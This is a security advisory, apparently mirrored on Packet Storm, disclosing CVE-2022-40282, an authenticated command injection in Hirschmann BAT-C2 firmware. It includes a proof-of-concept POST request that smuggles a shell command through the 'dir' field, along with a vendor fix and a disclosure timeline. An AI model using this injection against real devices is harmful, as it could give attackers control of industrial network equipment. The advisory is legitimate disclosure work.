exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection
Posted Nov 30, 2022
Authored by T. Weber | Site cyberdanube.com

Hirschmann (Belden) BAT-C2 version 8.8.1.0R8 suffers from a remote authenticated command injection vulnerability.

tags | exploit, remote
advisories | CVE-2022-40282
SHA-256 | 902fa02d042cb42bf90b944d2600703447b836b6f9b4d286e2b0bca32793a471

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

Change Mirror Download
CyberDanube Security Research 20221124-0
-------------------------------------------------------------------------------
title| Authenticated Command Injection
product| Hirschmann (Belden) BAT-C2
vulnerable version| 8.8.1.0R8
fixed version| 09.13.01.00R04
CVE number| CVE-2022-40282
impact| High
homepage| https://hirschmann.com/
| https://beldensolutions.com
found| 2022-08-01
by| T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"The Technology and Market Leader in Industrial Networking. Hirschmann™
develops innovative solutions, which are geared towards its customers’
requirements in terms of performance, efficiency and investment
reliability."

Source:
https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml


Vulnerable versions
-------------------------------------------------------------------------------
Hirschmann BAT-C2 / 8.8.1.0R8

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection.
It allows an attacker to gain full access to the underlying operating
system of
the device with all implications. If such a device is acting as key
device in
an industrial network, or controls various critical equipment via serial
ports,
more extensive damage in the corresponding network can be done by an
attacker.


Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The command "ping 192.168.1.1" was injected to the system by using the
following POST request:
===============================================================================
POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username="admin", realm="config",
nonce="4b63bb796252d310", uri="/", algorithm=MD5,
response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a,
cnonce="99c14d39557e691d"
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/
===============================================================================


The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution
-------------------------------------------------------------------------------
Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

Workaround
-------------------------------------------------------------------------------
None


Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends customers from Hirschmann to upgrade the firmware
to the
latest version available. Furthermore, a full security review by
professionals
is recommended.


Contact Timeline
-------------------------------------------------------------------------------
2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden
contact
suspects a duplicate. Asked contact for more information.
2022-08-18: Belden representative sent more information for clarification.
Highlighted differences between PoCs.
2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
2022-08-30: Asked for an update.
2022-08-31: Vendor stated, that he will release another security
bulletin for
this vulnerability.
2022-09-27: Asked for an update.
2022-09-28: Vendor is currently testing the new firmware version and has
also
been assigned with an CVE number. Draft of security
bulletin was
also sent by the security contact.
2022-10-12: Asked for an update.
2022-10-13: Belden contact stated, that there is no publication date for
now as
another patch must be integrated.
2022-10-28: Security contact informed us, that the patch will be released
within the next two weeks.
2022-11-22: Asked for a status update; Security contact stated, that the
release was delayed due internal reasons.
2022-11-23: Vendor sent the final version of the security bulletins. The
release of the new firmware version will be 2022-11-28.
2022-11-24: Vendor informed CyberDanube that the release of the bulletin and
the firmware was done on 2022-11-23 by the marketing team.
Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close